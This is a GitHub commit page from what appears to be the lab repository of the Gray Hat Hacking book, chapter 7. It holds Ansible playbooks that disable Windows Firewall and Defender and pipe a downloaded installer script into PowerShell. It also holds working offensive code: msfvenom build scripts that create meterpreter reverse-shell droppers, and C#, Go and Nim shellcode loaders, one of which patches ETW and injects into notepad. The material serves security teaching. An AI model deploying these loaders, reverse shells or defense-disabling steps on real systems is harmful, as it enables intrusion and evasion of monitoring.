-
Notifications
You must be signed in to change notification settings - Fork 49
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge branch 'main' of github.com:GrayHatHacking/GHHv6
- Loading branch information
Showing
52 changed files
with
1,358 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
[defaults] | ||
host_key_checking = False | ||
enable_task_debugger = True | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
--- | ||
- hosts: dc | ||
roles: | ||
- common | ||
- windows_dns_server | ||
- windows_domain_controller | ||
- windows_domain_users_groups | ||
vars_files: | ||
- vars/vars.yml | ||
- vars/users.yml | ||
- hosts: target | ||
gather_facts: yes | ||
roles: | ||
- common | ||
- windows_client_join_domain | ||
- target_customizations | ||
vars_files: | ||
- vars/vars.yml | ||
- hosts: kali | ||
become: yes | ||
roles: | ||
- kali_customizations | ||
vars_files: | ||
- vars/vars.yml | ||
- vars/users.yml |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
--- | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
--- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,16 @@ | ||
--- | ||
galaxy_info: | ||
role_name: install_misc_software | ||
author: Russ Nolen rnolen@splunk.com | ||
description: Install some basic software | ||
license: BSD | ||
min_ansible_version: 2.4 | ||
platforms: | ||
- name: Windows | ||
versions: | ||
- 2012R2 | ||
- Win10 | ||
galaxy_tags: | ||
- system | ||
- security | ||
dependencies: [] |
7 changes: 7 additions & 0 deletions
7
ch07/Lab/ansible/roles/common/tasks/chocolatey-components.yml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,7 @@ | ||
--- | ||
- name: Install Chocolately via Powershell | ||
win_shell: "Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iwr https://chocolatey.org/install.ps1 -UseBasicParsing | iex | ||
" | ||
- name: Install notepadplusplus | ||
win_chocolatey: | ||
name: notepadplusplus |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
--- | ||
# need to wrap an if statement around this one | ||
# make it windows specific | ||
- name : Disable Windows Firewall | ||
win_firewall: | ||
state: disabled | ||
- include: windows-disable-defender.yml | ||
when: ansible_distribution is search ('Microsoft') | ||
- include: chocolatey-components.yml |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
--- | ||
- name: Install the Visual C++ Redistributable | ||
win_package: | ||
path: "https://download.microsoft.com/download/9/3/F/93FCF1E7-E6A4-478B-96E7-D4B285925B00/vc_redist.x64.exe" | ||
product_id: '{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}' | ||
arguments: /install /passive /norestart |
8 changes: 8 additions & 0 deletions
8
ch07/Lab/ansible/roles/common/tasks/windows-disable-defender.yml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
--- | ||
|
||
- name: Disable Windows Defender | ||
win_regedit: | ||
key: "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection" | ||
value: DisableRealTimeMonitoring | ||
datatype: dword | ||
data: 1 |
8 changes: 8 additions & 0 deletions
8
ch07/Lab/ansible/roles/kali_customizations/files/addshare.txt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
[ghh] | ||
comment = GHH Share | ||
browseable = yes | ||
path = /tmp | ||
printable = no | ||
guest ok = yes | ||
read only = yes | ||
create mask = 0700 |
10 changes: 10 additions & 0 deletions
10
ch07/Lab/ansible/roles/kali_customizations/files/covenant.patch
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
--- /usr/share/kaboxer/covenant.kaboxer.orig 2021-09-12 19:28:35.392506176 +0000 | ||
+++ /usr/share/kaboxer/covenant.kaboxer.yaml 2021-09-12 18:54:26.224293412 +0000 | ||
@@ -26,6 +26,7 @@ | ||
publish_ports: | ||
- 7443 | ||
- 443 | ||
+ - 80 | ||
before_run_script: | | ||
#!/bin/sh | ||
set -e |
17 changes: 17 additions & 0 deletions
17
ch07/Lab/ansible/roles/kali_customizations/files/shells/build_csharp.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
#!/bin/bash | ||
|
||
SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40` | ||
|
||
# Replae relevant lines | ||
SC=${SC/buf/shellcode} | ||
|
||
PRE=`grep -B 1000 INJECT csharp.template | grep -v INJECT` | ||
POST=`grep -A 1000 INJECT csharp.template | grep -v INJECT` | ||
|
||
# Format the output | ||
echo "$PRE" > csharp.cs | ||
echo "$SC" >> csharp.cs | ||
echo "$POST" >> csharp.cs | ||
|
||
mcs csharp.cs -out:/tmp/csharp_dropper64.exe | ||
chmod 755 /tmp/csharp_dropper64.exe |
10 changes: 10 additions & 0 deletions
10
ch07/Lab/ansible/roles/kali_customizations/files/shells/build_go.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
#!/bin/bash | ||
|
||
SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f base64 --platform windows --arch x64 LHOST=10.0.0.40` | ||
CODE=`cat go.template` | ||
# Replae relevant lines | ||
CODE=${CODE/INJECT/$SC} | ||
echo "$CODE" > createFiber.go | ||
|
||
GOOS=windows GOARCH=amd64 go build -o /tmp/CreateFiber.exe createFiber.go | ||
chmod 755 /tmp/CreateFiber.exe |
19 changes: 19 additions & 0 deletions
19
ch07/Lab/ansible/roles/kali_customizations/files/shells/build_nim.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,19 @@ | ||
#!/bin/bash | ||
|
||
SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40` | ||
|
||
# Replae relevant lines | ||
ORIG="byte[] buf = new byte[" | ||
FIX="var shellcode: array[" | ||
SC=${SC/$ORIG/$FIX} | ||
SC=${SC/]/,byte] = } | ||
SC=${SC/\}/]} | ||
SC=${SC/{/\[ byte } | ||
SC=${SC/;/} | ||
SC=${SC/\[ \[/\[} | ||
SC=${SC//[$'\n']} | ||
CODE=`cat nim.template` | ||
CODE=${CODE/INJECTHERE/$SC} | ||
echo "$CODE" > dropper.nim | ||
|
||
nim c -d=mingw -b=cpp --passL="-static-libgcc -static-libstdc++" --app=console --cpu=amd64 --out=/tmp/nim_dropper64.exe dropper.nim |
45 changes: 45 additions & 0 deletions
45
ch07/Lab/ansible/roles/kali_customizations/files/shells/csharp.template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,45 @@ | ||
using System; | ||
using System.Runtime.InteropServices; | ||
|
||
|
||
namespace GHHSCLauncher | ||
{ | ||
class Program | ||
{ | ||
private static UInt32 MEM_COMMIT = 0x1000; | ||
private static UInt32 PAGE_READWRITE = 0x04; | ||
private static UInt32 PAGE_EXECUTE = 0x10; | ||
|
||
[DllImport("kernel32")] | ||
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); | ||
|
||
[DllImport("kernel32")] | ||
static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect); | ||
|
||
[DllImport("kernel32")] | ||
private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); | ||
|
||
[DllImport("kernel32")] | ||
private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds); | ||
|
||
static void Main() | ||
{ | ||
INJECT | ||
|
||
|
||
UInt32 scAddress = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_READWRITE); | ||
Marshal.Copy(shellcode, 0, (IntPtr)(scAddress), shellcode.Length); | ||
uint prot; | ||
VirtualProtect((IntPtr)(scAddress), shellcode.Length, PAGE_EXECUTE, out prot); | ||
IntPtr hThread = IntPtr.Zero; | ||
UInt32 threadId = 0; | ||
IntPtr pinfo = IntPtr.Zero; | ||
|
||
|
||
hThread = CreateThread(0, 0, scAddress, pinfo, 0, ref threadId); | ||
WaitForSingleObject(hThread, 0xFFFFFFFF); | ||
return; | ||
} | ||
|
||
} | ||
} |
94 changes: 94 additions & 0 deletions
94
ch07/Lab/ansible/roles/kali_customizations/files/shells/execute.template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,94 @@ | ||
import winim/lean | ||
import strformat | ||
import dynlib | ||
import osproc | ||
|
||
const patch: array[1, byte] = [byte 0xc3] | ||
|
||
proc Patchntdll(): bool = | ||
var | ||
ntdll: LibHandle | ||
cs: pointer | ||
op: DWORD | ||
t: DWORD | ||
disabled: bool = false | ||
|
||
ntdll = loadLib("ntdll") | ||
if isNil(ntdll): | ||
echo "[X] Failed to load ntdll.dll" | ||
return disabled | ||
|
||
cs = ntdll.symAddr("EtwEventWrite") # equivalent of GetProcAddress() | ||
if isNil(cs): | ||
echo "[X] Failed to get the address of 'EtwEventWrite'" | ||
return disabled | ||
|
||
if VirtualProtect(cs, patch.len, 0x40, addr op): | ||
echo "[*] Applying patch" | ||
copyMem(cs, unsafeAddr patch, patch.len) | ||
VirtualProtect(cs, patch.len, op, addr t) | ||
disabled = true | ||
|
||
return disabled | ||
|
||
|
||
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void = | ||
|
||
# Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D | ||
let tProcess = startProcess("notepad.exe") | ||
tProcess.suspend() # That's handy! | ||
defer: tProcess.close() | ||
|
||
echo "[*] Target Process: ", tProcess.processID | ||
|
||
let pHandle = OpenProcess( | ||
PROCESS_ALL_ACCESS, | ||
false, | ||
cast[DWORD](tProcess.processID) | ||
) | ||
defer: CloseHandle(pHandle) | ||
|
||
echo "[*] pHandle: ", pHandle | ||
|
||
let rPtr = VirtualAllocEx( | ||
pHandle, | ||
NULL, | ||
cast[SIZE_T](shellcode.len), | ||
MEM_COMMIT, | ||
PAGE_EXECUTE_READ_WRITE | ||
) | ||
|
||
var bytesWritten: SIZE_T | ||
let wSuccess = WriteProcessMemory( | ||
pHandle, | ||
rPtr, | ||
unsafeAddr shellcode, | ||
cast[SIZE_T](shellcode.len), | ||
addr bytesWritten | ||
) | ||
|
||
echo "[*] WriteProcessMemory: ", bool(wSuccess) | ||
echo " \\-- bytes written: ", bytesWritten | ||
echo "" | ||
|
||
let tHandle = CreateRemoteThread( | ||
pHandle, | ||
NULL, | ||
0, | ||
cast[LPTHREAD_START_ROUTINE](rPtr), | ||
NULL, | ||
0, | ||
NULL | ||
) | ||
defer: CloseHandle(tHandle) | ||
|
||
echo "[*] tHandle: ", tHandle | ||
echo "[+] Injected" | ||
|
||
INJECTHERE | ||
|
||
# This is essentially the equivalent of 'if __name__ == '__main__' in python | ||
when isMainModule: | ||
var success = Patchntdll() | ||
echo fmt"[*] ETW blocked by patch: {bool(success)}" | ||
injectCreateRemoteThread(shellcode) |
5 changes: 5 additions & 0 deletions
5
ch07/Lab/ansible/roles/kali_customizations/files/shells/go.mod
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
module createFiber.go | ||
|
||
go 1.15 | ||
|
||
require golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 // indirect |
2 changes: 2 additions & 0 deletions
2
ch07/Lab/ansible/roles/kali_customizations/files/shells/go.sum
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,2 @@ | ||
golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7 h1:c20P3CcPbopVp2f7099WLOqSNKURf30Z0uq66HpijZY= | ||
golang.org/x/sys v0.0.0-20210923061019-b8560ed6a9b7/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= |
87 changes: 87 additions & 0 deletions
87
ch07/Lab/ansible/roles/kali_customizations/files/shells/go.template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,87 @@ | ||
// Inspired by ired.team and Ne0nd0g's go-shellcode repository | ||
// Reference: https://github.com/Ne0nd0g/go-shellcode | ||
// Reference: https://ired.team/offensive-security/code-injection-process-injection/executing-shellcode-with-createfiber | ||
|
||
|
||
package main | ||
|
||
// import modules we'll need. We will need unsafe and the windows libraries to be able to | ||
// launch shellcode. The winddows library let's us use DLLs and unsafe bypasses go | ||
// restrictions around casting so that we can execute code | ||
|
||
import ( | ||
"encoding/base64" | ||
"fmt" | ||
"unsafe" | ||
"golang.org/x/sys/windows" | ||
) | ||
|
||
// Constants that we will need | ||
const ( | ||
_MEM_COMMIT = 0x1000 | ||
_MEM_RESERVE = 0x2000 | ||
_PAGE_RWX = 0x40 | ||
) | ||
|
||
func main() { | ||
|
||
|
||
// shellcode in base64 | ||
sc := "INJECT" | ||
|
||
shellcode, err := base64.StdEncoding.DecodeString(sc) | ||
if err != nil { | ||
fmt.Sprintf("Base64 Decoding Error: %s", err.Error()) | ||
return | ||
} | ||
|
||
// Load dlls | ||
kernel32 := windows.NewLazySystemDLL("kernel32.dll") | ||
ntdll := windows.NewLazySystemDLL("ntdll.dll") | ||
|
||
// memory creation/copy routines | ||
VirtualAlloc := kernel32.NewProc("VirtualAlloc") | ||
RtlCopyMemory := ntdll.NewProc("RtlCopyMemory") | ||
|
||
// Fiber creation routines | ||
ConvertThreadToFiber := kernel32.NewProc("ConvertThreadToFiber") | ||
CreateFiber := kernel32.NewProc("CreateFiber") | ||
SwitchToFiber := kernel32.NewProc("SwitchToFiber") | ||
|
||
// Only fibers can scedule fibers, so this convers the main thread into a fiber | ||
_, _, err = ConvertThreadToFiber.Call() | ||
|
||
if err != nil && err.Error() != "The operation completed successfully." { | ||
fmt.Sprintf("ConvertThreadToFiber Failed: %s", err.Error()) | ||
return | ||
} | ||
|
||
// Create memory for our shellcode | ||
addr, _, err:= VirtualAlloc.Call(0, uintptr(len(shellcode)), _MEM_COMMIT|_MEM_RESERVE, _PAGE_RWX) | ||
|
||
if ((err != nil && err.Error() != "The operation completed successfully.") || addr == 0) { | ||
fmt.Sprintf("VirtualAlloc Failed:%s", err.Error()) | ||
return | ||
} | ||
|
||
// Copy shellcode to our newly created memory | ||
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) | ||
|
||
if err != nil && err.Error() != "The operation completed successfully." { | ||
fmt.Sprintf("RtlCopyMemory Failed:%s", err.Error()) | ||
return | ||
} | ||
|
||
// Create Fiber to execute shellcode | ||
fiber, _, err:= CreateFiber.Call(0, addr, 0) | ||
|
||
if err!= nil && err.Error() != "The operation completed successfully." { | ||
fmt.Sprintf("CreateFiber Failed:%s", err.Error()) | ||
return | ||
} | ||
|
||
// Switch to Fiber | ||
SwitchToFiber.Call(fiber) | ||
|
||
|
||
} |
Oops, something went wrong.